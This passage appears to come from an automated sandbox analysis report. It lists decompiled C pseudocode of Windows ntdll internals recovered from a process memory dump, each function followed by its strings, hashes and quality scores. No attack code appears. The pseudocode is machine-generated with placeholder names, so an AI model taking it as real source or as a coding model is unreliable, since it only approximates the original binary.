                            										L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                            										_t51 = 0xc0000106;
                            									} else {
                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                            										goto L5;
                            									}
                            								} else {
                            									L5:
                            									 *_a4 = _t109;
                            									_t51 = 0;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t51;
                            			}


























                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction ID: 8c4eb0fb1093d8e2ed115f69f11b060ac10037978ece70c568ef431a827783c6
                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction Fuzzy Hash: DC518D716047119FD321DF29C840A6BBBF9FF48B18F10892DFAA587690E7B4E914CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E01363540(intOrPtr _a4) {
                            				signed int _v12;
                            				intOrPtr _v88;
                            				intOrPtr _v92;
                            				char _v96;
                            				char _v352;
                            				char _v1072;
                            				intOrPtr _v1140;
                            				intOrPtr _v1148;
                            				char _v1152;
                            				char _v1156;
                            				char _v1160;
                            				char _v1164;
                            				char _v1168;
                            				char* _v1172;
                            				short _v1174;
                            				char _v1176;
                            				char _v1180;
                            				char _v1192;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				short _t41;
                            				short _t42;
                            				intOrPtr _t80;
                            				intOrPtr _t81;
                            				signed int _t82;
                            				void* _t83;
                            
                            				_v12 =  *0x13dd360 ^ _t82;
                            				_t41 = 0x14;
                            				_v1176 = _t41;
                            				_t42 = 0x16;
                            				_v1174 = _t42;
                            				_v1164 = 0x100;
                            				_v1172 = L"BinaryHash";
                            				_t81 = E01320BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                            				if(_t81 < 0) {
                            					L11:
                            					_t75 = _t81;
                            					E01363706(0, _t81, _t79, _t80);
                            					L12:
                            					if(_a4 != 0xc000047f) {
                            						E0132FA60( &_v1152, 0, 0x50);
                            						_v1152 = 0x60c201e;
                            						_v1148 = 1;
                            						_v1140 = E01363540;
                            						E0132FA60( &_v1072, 0, 0x2cc);
                            						_push( &_v1072);
                            						E0133DDD0( &_v1072, _t75, _t79, _t80, _t81);
                            						E01370C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                            						_push(_v1152);
                            						_push(0xffffffff);
                            						E013297C0();
                            					}
                            					return E0132B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                            				}
                            				_t79 =  &_v352;
                            				_t81 = E01363971(0, _a4,  &_v352,  &_v1156);
                            				if(_t81 < 0) {
                            					goto L11;
                            				}
                            				_t75 = _v1156;
                            				_t79 =  &_v1160;
                            				_t81 = E01363884(_v1156,  &_v1160,  &_v1168);
                            				if(_t81 >= 0) {
                            					_t80 = _v1160;
                            					E0132FA60( &_v96, 0, 0x50);
                            					_t83 = _t83 + 0xc;
                            					_push( &_v1180);
                            					_push(0x50);
                            					_push( &_v96);
                            					_push(2);
                            					_push( &_v1176);
                            					_push(_v1156);
                            					_t81 = E01329650();
                            					if(_t81 >= 0) {
                            						if(_v92 != 3 || _v88 == 0) {
                            							_t81 = 0xc000090b;
                            						}
                            						if(_t81 >= 0) {
                            							_t75 = _a4;
                            							_t79 =  &_v352;
                            							E01363787(_a4,  &_v352, _t80);
                            						}
                            					}
                            					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                            				}
                            				_push(_v1156);
                            				E013295D0();
                            				if(_t81 >= 0) {
                            					goto L12;
                            				} else {
                            					goto L11;
                            				}
                            			}
































                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: BinaryHash
                            • API String ID: 0-2202222882
                            • Opcode ID: 9867e5b1ff9de4d55ab7694de724dd0ebf3a59141eb9afc655e8bd58c68ccd44
                            • Instruction ID: 8589596f714c06ebc1da135229012eabc35a856e6852088f0218ab4600f8694e
                            • Opcode Fuzzy Hash: 9867e5b1ff9de4d55ab7694de724dd0ebf3a59141eb9afc655e8bd58c68ccd44
                            • Instruction Fuzzy Hash: BD4146B1D0052D9BDF21DA54CC85FDEB77CAB54728F0085A5EA0DA7241DB309E88CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E013B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                            				signed int _v20;
                            				char _v24;
                            				signed int _v28;
                            				char _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				void* __ebx;
                            				void* _t35;
                            				signed int _t42;
                            				char* _t48;
                            				signed int _t59;
                            				signed char _t61;
                            				signed int* _t79;
                            				void* _t88;
                            
                            				_v28 = __edx;
                            				_t79 = __ecx;
                            				if(E013B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                            					L13:
                            					_t35 = 0;
                            					L14:
                            					return _t35;
                            				}
                            				_t61 = __ecx[1];
                            				_t59 = __ecx[0xf];
                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                            				_v36 = _a8 << 0xc;
                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                            				asm("sbb esi, esi");
                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                            				if(_t42 != 0) {
                            					_push(0);
                            					_push(0x14);
                            					_push( &_v24);
                            					_push(3);
                            					_push(_t59);
                            					_push(0xffffffff);
                            					if(E01329730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                            						_push(_t61);
                            						E013AA80D(_t59, 1, _v20, 0);
                            						_t88 = 4;
                            					}
                            				}
                            				_t35 = E013AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                            				if(_t35 < 0) {
                            					goto L14;
                            				}
                            				E013B1293(_t79, _v40, E013B07DF(_t79, _v28,  &_a4,  &_a8, 1));
                            				if(E01307D50() == 0) {
                            					_t48 = 0x7ffe0380;
                            				} else {
                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            				}
                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            					E013A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                            				}
                            				goto L13;
                            			}


















                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: `
                            • API String ID: 0-2679148245
                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                            • Instruction ID: b3031a955f24ddac1e1c91c9df9918f0309a1e6abc8640db0ebbf3468753da03
                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                            • Instruction Fuzzy Hash: 5631F3326003066BE714DE28CC85F9B7BE9EBC4768F144229FB54ABA80E670E904C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E01363884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                            				char _v8;
                            				intOrPtr _v12;
                            				intOrPtr* _v16;
                            				char* _v20;
                            				short _v22;
                            				char _v24;
                            				intOrPtr _t38;
                            				short _t40;
                            				short _t41;
                            				void* _t44;
                            				intOrPtr _t47;
                            				void* _t48;
                            
                            				_v16 = __edx;
                            				_t40 = 0x14;
                            				_v24 = _t40;
                            				_t41 = 0x16;
                            				_v22 = _t41;
                            				_t38 = 0;
                            				_v12 = __ecx;
                            				_push( &_v8);
                            				_push(0);
                            				_push(0);
                            				_push(2);
                            				_t43 =  &_v24;
                            				_v20 = L"BinaryName";
                            				_push( &_v24);
                            				_push(__ecx);
                            				_t47 = 0;
                            				_t48 = E01329650();
                            				if(_t48 >= 0) {
                            					_t48 = 0xc000090b;
                            				}
                            				if(_t48 != 0xc0000023) {
                            					_t44 = 0;
                            					L13:
                            					if(_t48 < 0) {
                            						L16:
                            						if(_t47 != 0) {
                            							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                            						}
                            						L18:
                            						return _t48;
                            					}
                            					 *_v16 = _t38;
                            					 *_a4 = _t47;
                            					goto L18;
                            				}
                            				_t47 = L01304620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                            				if(_t47 != 0) {
                            					_push( &_v8);
                            					_push(_v8);
                            					_push(_t47);
                            					_push(2);
                            					_push( &_v24);
                            					_push(_v12);
                            					_t48 = E01329650();
                            					if(_t48 < 0) {
                            						_t44 = 0;
                            						goto L16;
                            					}
                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                            						_t48 = 0xc000090b;
                            					}
                            					_t44 = 0;
                            					if(_t48 < 0) {
                            						goto L16;
                            					} else {
                            						_t17 = _t47 + 0xc; // 0xc
                            						_t38 = _t17;
                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                            							_t48 = 0xc000090b;
                            						}
                            						goto L13;
                            					}
                            				}
                            				_t48 = _t48 + 0xfffffff4;
                            				goto L18;
                            			}
















                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: BinaryName
                            • API String ID: 0-215506332
                            • Opcode ID: 3f33bf9cb56eae20e633d53ff1c0ade6c1889e0b8edce10e49e3702cf33b99e5
                            • Instruction ID: aeb94d5505e5aca214224ec7825bb2e3af7d1ba1ae39c3e1e0890c575d067e1c
                            • Opcode Fuzzy Hash: 3f33bf9cb56eae20e633d53ff1c0ade6c1889e0b8edce10e49e3702cf33b99e5
                            • Instruction Fuzzy Hash: D331E532D0051AAFEB15DA5CC945F7BBBF8FF51B28F018169E918A7295D7309E04CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E0131D294(void* __ecx, char __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				intOrPtr _v64;
                            				char* _v68;
                            				intOrPtr _v72;
                            				char _v76;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				char _v92;
                            				intOrPtr _v96;
                            				intOrPtr _v100;
                            				char _v104;
                            				char _v105;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t35;
                            				char _t38;
                            				signed int _t40;
                            				signed int _t44;
                            				signed int _t52;
                            				void* _t53;
                            				void* _t55;
                            				void* _t61;
                            				intOrPtr _t62;
                            				void* _t64;
                            				signed int _t65;
                            				signed int _t66;
                            
                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                            				_v8 =  *0x13dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                            				_v105 = __edx;
                            				_push( &_v92);
                            				_t52 = 0;
                            				_push(0);
                            				_push(0);
                            				_push( &_v104);
                            				_push(0);
                            				_t59 = __ecx;
                            				_t55 = 2;
                            				if(E01304120(_t55, __ecx) < 0) {
                            					_t35 = 0;
                            					L8:
                            					_pop(_t61);
                            					_pop(_t64);
                            					_pop(_t53);
                            					return E0132B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                            				}
                            				_v96 = _v100;
                            				_t38 = _v92;
                            				if(_t38 != 0) {
                            					_v104 = _t38;
                            					_v100 = _v88;
                            					_t40 = _v84;
                            				} else {
                            					_t40 = 0;
                            				}
                            				_v72 = _t40;
                            				_v68 =  &_v104;
                            				_push( &_v52);
                            				_v76 = 0x18;
                            				_push( &_v76);
                            				_v64 = 0x40;
                            				_v60 = _t52;
                            				_v56 = _t52;
                            				_t44 = E013298D0();
                            				_t62 = _v88;
                            				_t65 = _t44;
                            				if(_t62 != 0) {
                            					asm("lock xadd [edi], eax");
                            					if((_t44 | 0xffffffff) != 0) {
                            						goto L4;
                            					}
                            					_push( *((intOrPtr*)(_t62 + 4)));
                            					E013295D0();
                            					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                            					goto L4;
                            				} else {
                            					L4:
                            					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                            					if(_t65 >= 0) {
                            						_t52 = 1;
                            					} else {
                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                            						}
                            					}
                            					_t35 = _t52;
                            					goto L8;
                            				}
                            			}


                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 7d668f609af5f201680f209e34a999fdd81131bbd274c9789ee997f1481cb991
                            • Instruction ID: cefd9f6ed68a968d738352526a29ae6ba362325da7af43a7b568d4774ee681f3
                            • Opcode Fuzzy Hash: 7d668f609af5f201680f209e34a999fdd81131bbd274c9789ee997f1481cb991
                            • Instruction Fuzzy Hash: C431A2B15083059FC325DF6CC984A6BBBE8EB9A758F000A2EF99483650D734DD05CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E012F1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                            				intOrPtr _v8;
                            				char _v16;
                            				intOrPtr* _t26;
                            				intOrPtr _t29;
                            				void* _t30;
                            				signed int _t31;
                            
                            				_t27 = __ecx;
                            				_t29 = __edx;
                            				_t31 = 0;
                            				_v8 = __edx;
                            				if(__edx == 0) {
                            					L18:
                            					_t30 = 0xc000000d;
                            					goto L12;
                            				} else {
                            					_t26 = _a4;
                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                            						goto L18;
                            					} else {
                            						E0132BB40(__ecx,  &_v16, __ecx);
                            						_push(_t26);
                            						_push(0);
                            						_push(0);
                            						_push(_t29);
                            						_push( &_v16);
                            						_t30 = E0132A9B0();
                            						if(_t30 >= 0) {
                            							_t19 =  *_t26;
                            							if( *_t26 != 0) {
                            								goto L7;
                            							} else {
                            								 *_a8 =  *_a8 & 0;
                            							}
                            						} else {
                            							if(_t30 != 0xc0000023) {
                            								L9:
                            								_push(_t26);
                            								_push( *_t26);
                            								_push(_t31);
                            								_push(_v8);
                            								_push( &_v16);
                            								_t30 = E0132A9B0();
                            								if(_t30 < 0) {
                            									L12:
                            									if(_t31 != 0) {
                            										L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                            									}
                            								} else {
                            									 *_a8 = _t31;
                            								}
                            							} else {
                            								_t19 =  *_t26;
                            								if( *_t26 == 0) {
                            									_t31 = 0;
                            								} else {
                            									L7:
                            									_t31 = L01304620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                            								}
                            								if(_t31 == 0) {
                            									_t30 = 0xc0000017;
                            								} else {
                            									goto L9;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t30;
                            			}


                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: WindowsExcludedProcs
                            • API String ID: 0-3583428290
                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction ID: b7fdeeb965e89ead08a8c891c61a05dd03306ef43fe32cf2ea713aae32d72ca4
                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction Fuzzy Hash: A621C27A611229EBDB229A5DC840F6BFBADEF41A54F454439FB049B200D631ED1097A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0130F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                            				intOrPtr _t13;
                            				intOrPtr _t14;
                            				signed int _t16;
                            				signed char _t17;
                            				intOrPtr _t19;
                            				intOrPtr _t21;
                            				intOrPtr _t23;
                            				intOrPtr* _t25;
                            
                            				_t25 = _a8;
                            				_t17 = __ecx;
                            				if(_t25 == 0) {
                            					_t19 = 0xc00000f2;
                            					L8:
                            					return _t19;
                            				}
                            				if((__ecx & 0xfffffffe) != 0) {
                            					_t19 = 0xc00000ef;
                            					goto L8;
                            				}
                            				_t19 = 0;
                            				 *_t25 = 0;
                            				_t21 = 0;
                            				_t23 = "Actx ";
                            				if(__edx != 0) {
                            					if(__edx == 0xfffffffc) {
                            						L21:
                            						_t21 = 0x200;
                            						L5:
                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                            						 *_t25 = _t13;
                            						L6:
                            						if(_t13 == 0) {
                            							if((_t17 & 0x00000001) != 0) {
                            								 *_t25 = _t23;
                            							}
                            						}
                            						L7:
                            						goto L8;
                            					}
                            					if(__edx == 0xfffffffd) {
                            						 *_t25 = _t23;
                            						_t13 = _t23;
                            						goto L6;
                            					}
                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                            					 *_t25 = _t13;
                            					L14:
                            					if(_t21 == 0) {
                            						goto L6;
                            					}
                            					goto L5;
                            				}
                            				_t14 = _a4;
                            				if(_t14 != 0) {
                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                            					if(_t16 <= 1) {
                            						_t21 = 0x1f8;
                            						_t13 = 0;
                            						goto L14;
                            					}
                            					if(_t16 == 2) {
                            						goto L21;
                            					}
                            					if(_t16 != 4) {
                            						_t19 = 0xc00000f0;
                            						goto L7;
                            					}
                            					_t13 = 0;
                            					goto L6;
                            				} else {
                            					_t21 = 0x1f8;
                            					goto L5;
                            				}
                            			}


                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Actx
                            • API String ID: 0-89312691
                            • Opcode ID: 2805d3395fa35ae2ecce237e0779e16b9d510a6d8130ae0a3fc8895961cebf23
                            • Instruction ID: 15d95a9770fd33671ab27f5731434a4303aa6dde47e337c47e9b6d12d439f0d5
                            • Opcode Fuzzy Hash: 2805d3395fa35ae2ecce237e0779e16b9d510a6d8130ae0a3fc8895961cebf23
                            • Instruction Fuzzy Hash: 0A1193353046068BE73B8E1D85B073676DDAB95EECF24452AE561CB7D1D7B0C8418343
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E01398DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t35;
                            				void* _t41;
                            
                            				_t40 = __esi;
                            				_t39 = __edi;
                            				_t38 = __edx;
                            				_t35 = __ecx;
                            				_t34 = __ebx;
                            				_push(0x74);
                            				_push(0x13c0d50);
                            				E0133D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                            					E01375720(0x65, 0, "Critical error detected %lx\n", _t35);
                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                            						asm("int3");
                            						 *(_t41 - 4) = 0xfffffffe;
                            					}
                            				}
                            				 *(_t41 - 4) = 1;
                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                            				 *((intOrPtr*)(_t41 - 0x64)) = L0133DEF0;
                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                            				_push(_t41 - 0x70);
                            				L0133DEF0(1, _t38);
                            				 *(_t41 - 4) = 0xfffffffe;
                            				return E0133D130(_t34, _t39, _t40);
                            			}


                            Strings
                            • Critical error detected %lx, xrefs: 01398E21
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Critical error detected %lx
                            • API String ID: 0-802127002
                            • Opcode ID: 74c6397e24db219ee792cb0cea6e3533c7fb6d22215c90c81d42b80769e1be76
                            • Instruction ID: 7a4bea6a3d6234ed28ba4643e5e8c1057e733d7ca4e18db3e310f2d7e021eaa1
                            • Opcode Fuzzy Hash: 74c6397e24db219ee792cb0cea6e3533c7fb6d22215c90c81d42b80769e1be76
                            • Instruction Fuzzy Hash: 3F1187B5D1034CDBDF28CFB8850579CBBB4BB45319F20429EE129AB282C3340602CF18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0137FF60
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                            • API String ID: 0-1911121157
                            • Opcode ID: af8d0364adc1ea03c388e43001054c94f60ec14c00edd7ae72ed8ca160d9f429
                            • Instruction ID: 045575578350c66082b2094665dbdfcc989534212a31bb73bdbdd57b589244bd
                            • Opcode Fuzzy Hash: af8d0364adc1ea03c388e43001054c94f60ec14c00edd7ae72ed8ca160d9f429
                            • Instruction Fuzzy Hash: 6C110471910544EFDB26DF58C948F98BBB1FF0471CF548058E10457261CB3D9954CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E013B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t296;
                            				signed char _t298;
                            				signed int _t301;
                            				signed int _t306;
                            				signed int _t310;
                            				signed char _t311;
                            				intOrPtr _t312;
                            				signed int _t313;
                            				void* _t327;
                            				signed int _t328;
                            				intOrPtr _t329;
                            				intOrPtr _t333;
                            				signed char _t334;
                            				signed int _t336;
                            				void* _t339;
                            				signed int _t340;
                            				signed int _t356;
                            				signed int _t362;
                            				short _t367;
                            				short _t368;
                            				short _t373;
                            				signed int _t380;
                            				void* _t382;
                            				short _t385;
                            				signed short _t392;
                            				signed char _t393;
                            				signed int _t395;
                            				signed char _t397;
                            				signed int _t398;
                            				signed short _t402;
                            				void* _t406;
                            				signed int _t412;
                            				signed char _t414;
                            				signed short _t416;
                            				signed int _t421;
                            				signed char _t427;
                            				intOrPtr _t434;
                            				signed char _t435;
                            				signed int _t436;
                            				signed int _t442;
                            				signed int _t446;
                            				signed int _t447;
                            				signed int _t451;
                            				signed int _t453;
                            				signed int _t454;
                            				signed int _t455;
                            				intOrPtr _t456;
                            				intOrPtr* _t457;
                            				short _t458;
                            				signed short _t462;
                            				signed int _t469;
                            				intOrPtr* _t474;
                            				signed int _t475;
                            				signed int _t479;
                            				signed int _t480;
                            				signed int _t481;
                            				short _t485;
                            				signed int _t491;
                            				signed int* _t494;
                            				signed int _t498;
                            				signed int _t505;
                            				intOrPtr _t506;
                            				signed short _t508;
                            				signed int _t511;
                            				void* _t517;
                            				signed int _t519;
                            				signed int _t522;
                            				void* _t523;
                            				signed int _t524;
                            				void* _t528;
                            				signed int _t529;
                            
                            				_push(0xd4);
                            				_push(0x13c1178);
                            				E0133D0E8(__ebx, __edi, __esi);
                            				_t494 = __edx;
                            				 *(_t528 - 0xcc) = __edx;
                            				_t511 = __ecx;
                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                            				 *(_t528 - 0xbc) = __ecx;
                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                            				_t427 = 0;
                            				 *(_t528 - 0x74) = 0;
                            				 *(_t528 - 0x9c) = 0;
                            				 *(_t528 - 0x84) = 0;
                            				 *(_t528 - 0xac) = 0;
                            				 *(_t528 - 0x88) = 0;
                            				 *(_t528 - 0xa8) = 0;
                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                            				if( *(_t528 + 0x1c) <= 0x80) {
                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                            					if(__eflags != 0) {
                            						_t421 = E013B4C56(0, __edx, __ecx, __eflags);
                            						__eflags = _t421;
                            						if(_t421 != 0) {
                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                            							E0132D000(0x410);
                            							 *(_t528 - 0x18) = _t529;
                            							 *(_t528 - 0x9c) = _t529;
                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                            							E013B5542(_t528 - 0x9c, _t528 - 0x84);
                            						}
                            					}
                            					_t435 = _t427;
                            					 *(_t528 - 0xd0) = _t435;
                            					_t474 = _t511 + 0x65;
                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                            					_t511 = 0x18;
                            					while(1) {
                            						 *(_t528 - 0xa0) = _t427;
                            						 *(_t528 - 0xbc) = _t427;
                            						 *(_t528 - 0x80) = _t427;
                            						 *(_t528 - 0x78) = 0x50;
                            						 *(_t528 - 0x79) = _t427;
                            						 *(_t528 - 0x7a) = _t427;
                            						 *(_t528 - 0x8c) = _t427;
                            						 *(_t528 - 0x98) = _t427;
                            						 *(_t528 - 0x90) = _t427;
                            						 *(_t528 - 0xb0) = _t427;
                            						 *(_t528 - 0xb8) = _t427;
                            						_t296 = 1 << _t435;
                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                            						__eflags = _t436 & _t296;
                            						if((_t436 & _t296) != 0) {
                            							goto L92;
                            						}
                            						__eflags =  *((char*)(_t474 - 1));
                            						if( *((char*)(_t474 - 1)) == 0) {
                            							goto L92;
                            						}
                            						_t301 =  *_t474;
                            						__eflags = _t494[1] - _t301;
                            						if(_t494[1] <= _t301) {
                            							L10:
                            							__eflags =  *(_t474 - 5) & 0x00000040;
                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                            								L12:
                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                            									goto L92;
                            								}
                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                            									goto L92;
                            								}
                            								__eflags = _t442 -  *(_t474 - 0x11);
                            								if(_t442 !=  *(_t474 - 0x11)) {
                            									goto L92;
                            								}
                            								L15:
                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                            								 *(_t528 - 0xc0) = _t306;
                            								 *(_t528 - 0xa4) = _t306;
                            								__eflags =  *0x13d60e8;
                            								if( *0x13d60e8 != 0) {
                            									__eflags = _t306 - 0x40;
                            									if(_t306 < 0x40) {
                            										L20:
                            										asm("lock inc dword [eax]");
                            										_t310 =  *0x13d60e8; // 0x0
                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                            										__eflags = _t311 & 0x00000001;
                            										if((_t311 & 0x00000001) == 0) {
                            											 *(_t528 - 0xa0) = _t311;
                            											_t475 = _t427;
                            											 *(_t528 - 0x74) = _t427;
                            											__eflags = _t475;
                            											if(_t475 != 0) {
                            												L91:
                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                            												goto L92;
                            											}
                            											asm("sbb edi, edi");
                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                            											_t511 = _t498;
                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                            											__eflags =  *(_t312 - 5) & 1;
                            											if(( *(_t312 - 5) & 1) != 0) {
                            												_push(_t528 - 0x98);
                            												_push(0x4c);
                            												_push(_t528 - 0x70);
                            												_push(1);
                            												_push(0xfffffffa);
                            												_t412 = E01329710();
                            												_t475 = _t427;
                            												__eflags = _t412;
                            												if(_t412 >= 0) {
                            													_t414 =  *(_t528 - 0x98) - 8;
                            													 *(_t528 - 0x98) = _t414;
                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                            													 *(_t528 - 0x8c) = _t416;
                            													 *(_t528 - 0x79) = 1;
                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                            													__eflags = _t511;
                            												}
                            											}
                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                            											__eflags = _t446 & 0x00000004;
